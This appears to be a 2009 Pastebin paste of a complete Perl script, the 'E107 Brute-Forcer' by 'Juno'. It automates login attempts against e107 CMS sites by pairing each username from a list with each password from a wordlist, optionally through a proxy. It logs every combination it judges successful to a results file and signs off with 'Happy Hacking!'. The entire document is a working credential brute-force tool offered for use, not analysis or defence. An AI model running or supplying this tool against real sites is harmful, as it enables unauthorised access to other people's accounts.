Guest User

Juno

a guest
Dec 17th, 2009
886
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. #Thanks also to IBM for helping to create this - Bret Swedeen especially
  3. #NBTDOTM
  4. use HTML::Parser;
  5. use WWW::Mechanize;
  6. use HTTP::Cookies;
  7. use Test::More no_plan;
  8.  
  9.  
  10. my $NumArgs = $#ARGV + 1;#Determine the number of arguments the user has given us
  11. if ($NumArgs <= 2) {
  12.     #Our user has only entered some information. Display help screen.
  13.     header();
  14.     exit();}
  15. if (($NumArgs == 3) or ($NumArgs == 4)){   
  16.     my $url = $ARGV[0]; #Host is the first argument supplied
  17.     my $userloc = $ARGV[1]; #Username is the 2nd argument supplied
  18.     my $passloc = $ARGV[2]; #Passlist location is 3rd argument 
  19.     my $proxyloc = $ARGV[3]; #Location of the proxy
  20.     #Display header
  21. print qq{
  22. ----------------------------------------------------------------------
  23.                   E107 Brute-Forcer          
  24.                 Custom Built by Juno             
  25.                               NBTDOTM                                
  26. ----------------------------------------------------------------------
  27. };
  28. print "\nYour host is: $url";
  29. print "\nYour userlist is: $userloc";
  30. print "\nYour password list is: $passloc";
  31. goto NoProxy if $proxyloc eq '';
  32. print "\nYour proxy is: http://$proxyloc";
  33.  
  34. NoProxy: print "\n\nThe program will now try bruteforcing the host you selected.";
  35. print "\nPress ENTER to begin, or Control-C to quit.";
  36. my $useless = <STDIN>; #Last chance for user to abort attack
  37. print "\nNBTDOTM\n-------------------------\n";
  38. print "\nCreating temp directory to store results in... ";
  39. mkdir('temp', 0777) || print $!;
  40. print "Done.";
  41. #Use userlist
  42. open USERLIST, $userloc or die$!;
  43. my @users = USERLIST;
  44. while (my $user = <USERLIST>) {
  45.     chomp($user);
  46.     print "\nCreating new directory for new user $user... ";
  47.     mkdir('temp' . '\\' . $user, 0777) || print $!;
  48.     print "Done.";
  49.         #Use passlist
  50.         open PASSLIST, $passloc or die $!;
  51.         my @lines = PASSLIST;
  52.         while (my $password = <PASSLIST>) {
  53.             chomp($password);
  54.             print "\nTrying USER $user PASSWORD $password... ";
  55.             my $outfile = 'temp' . '\\' . $user . '\\' . $password . ".htm";
  56.             my $mech = WWW::Mechanize->new(autocheck => 1);
  57.             $mech->stack_depth($max_depth => 0); #Set maxd to 0 if running out of memory;
  58.             $mech->timeout(60);
  59.             $mech->cookie_jar(HTTP::Cookies->new());
  60.             #Set proxy if specified
  61.             goto GETPAGE if $proxyloc eq '';
  62.             $mech->proxy(['http'], 'http://' . $proxyloc);
  63.            
  64.            
  65.             GETPAGE: $mech->get('http://' . $url);
  66.             my $test = $mech->success;
  67.             if ($@) {
  68.                 goto GETPAGE; #Error trapping
  69.                 }
  70.             print "$test";
  71.             $mech->field(username => "$user");
  72.             $mech->field(userpass => "$password");
  73.             $mech->click();
  74.             my $output_page = $mech->content();
  75.             open(OUTFILE, ">$outfile");
  76.             print OUTFILE "$output_page";
  77.             close(OUTFILE);
  78.             my $filesize = -s $outfile;
  79.             #Search file for 'incorrect','invalid', or 'wrong'; if not found, we have success!
  80.                 if ($output_page =~ /(incorrect|invalid|wrong)/i) {
  81.                     print "Wrong Passsword";
  82.                     } else {
  83.                     print "SUCCESS";
  84.                     my $successloc = 'Results.txt';
  85.                     open(SUCCESS, ">>$successloc");
  86.                     print SUCCESS "Successful login with USERNAME: $user PASSWORD: $password\n";
  87.                     close(SUCCESS);
  88.                 }
  89.                 #Output current progress to Progress.txt in case of crash
  90.                 open(PROGRESS, ">Progress.txt");
  91.                 print PROGRESS "E107 Brute force progress\n----------------------\nLast User Tried: $user\nLast Password Tried: $password\n";
  92.                 close(PROGRESS);
  93.             #Delete password file after analysis[Comment out if you want to keep]
  94.             my $delfile = 'temp' . '\\' . $user . '\\' . $password . ".htm";
  95.             unlink($delfile);
  96.         print ".";
  97.         }
  98.     #Delete username directory
  99.     rmdir('temp' . '\\' . $user);
  100.         }
  101. #Delete temp directory
  102. rmdir('temp');
  103. }
  104. print "\n\nAttack complete!\nResults will be located in Results.txt.";
  105. my $resultsloc = 'Results.txt';
  106. open(RESULTS, ">>$resultsloc");
  107. print RESULTS "----------------\nAttack Complete\n----------------\n";
  108. close(RESULTS);
  109. exit();
  110. sub header{
  111. print qq{
  112. ----------------------------------------------------------------------
  113.                   E107 Brute-Forcer          
  114.                 Custom Built by Juno             
  115.                               NBTDOTM                                
  116. ----------------------------------------------------------------------
  117. Usage: E107Brute [target site] [userlist] [passlist] (proxy)
  118.  
  119. Example: E107Brute somesite.com/login.php users.txt passwords.txt 192.
  120. 168.1.1:80
  121.  
  122. The program will attempt a bruteforce on the usernames specified using
  123. the password list that was supplied. No switches(-) are needed for the
  124. arguments.  Remember to specifiy the full URL to the login page.  The
  125. proxy argument is optional; just omit if you don't need it. Results can
  126. be found in the folder that this tool is run under in 'Results.txt'.
  127. Happy Hacking!
  128. };
  129. }
RAW Paste Data